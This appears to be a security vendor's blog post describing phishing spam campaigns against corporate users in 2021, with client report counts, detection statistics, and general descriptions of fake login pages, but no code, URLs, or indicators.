AhnLab collects dozens of phishing spam mails from several clients daily. Phishing spam mails can be divided into two major types. The first type is using a fabricated e-mail from the get-go (e.g. asking to reply with personal information). The second type includes the address of the phishing website in the body of the e-mail, prompting the user to connect to it, or includes the script file of the phishing website as an attachment. This post will explain the characteristics of recent phishing attacks and the current state of damage from the second type phishing that must be blocked by security products.
When connecting to the phishing website address included in the body of the e-mail or to the attached HTML file through a web browser, the user is connected to a page that asks the user to enter personal information such as company account ID or password. When comparing such phishing pages of the past with normal pages, there were many elements that the users could be suspicious of due to the poor screen content, layout, and such. However, when compared with normal websites today, they are built to look almost identical, thus it is difficult for users to realize that their information is leaked even after entering their personal information.
There have been numerous attempts of such attacks targeting corporate users especially. Therefore, this post aims to minimize the damage from the attacks by introducing the characteristics of the attack type in detail.
Current State of Damage
1) Current state of client-reported e-mails
AhnLab receives around 10 to 30 reports of malicious spam mails daily based on one day of reports from XXX client.
2) Malware detection
In order to detect phishing malware, AhnLab uses various points to apply detection patterns. The number of cases detected in an actual client’s environment with only the newly-applied pattern in the month of August in 2021 is as follows: More than 5,400 cases of phishing malware were reported by around 1,000 clients.
5,420 Count 949 PCID
The pattern mentioned here is limited to a comprehensive detection method that can diagnose 1:N multiple files, not 1:1 single file. This means that the count detected above is the minimum number of cases, and if the cases that were detected with the previously-applied pattern were included, it is assumed that there would be much more damages caused by phishing malware.
1) Example of spam mail
The following is one example of the spam mails collected from client XXX for the month of August 2021. Users who often receive e-mails from outside the company are likely to connect to malicious websites without a second thought. There has also been a case of spam mail disguised as an e-mail related to company infrastructure. Such e-mails often include the company name in the subject, sender, and body to easily earn trust, thus users must be vigilant.
1) Example of phishing websites
The following is the screen users see when they connect to the phishing website address included in the spam mail or run the HTML file using a web browser. They commonly aim to steal a well-known service account information or user’s company account. Many pages are built intricately from their title to the background image so that they can be mistaken for normal websites. Some of the phishing websites these days have the effect of page redirection taking some time as if it is a verification process.
Phishing script files and the action of connecting to phishing websites are the targets for blocking. AhnLab’s products use the aliases below. Only a few of the aliases are listed as they are continuing to be updated.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.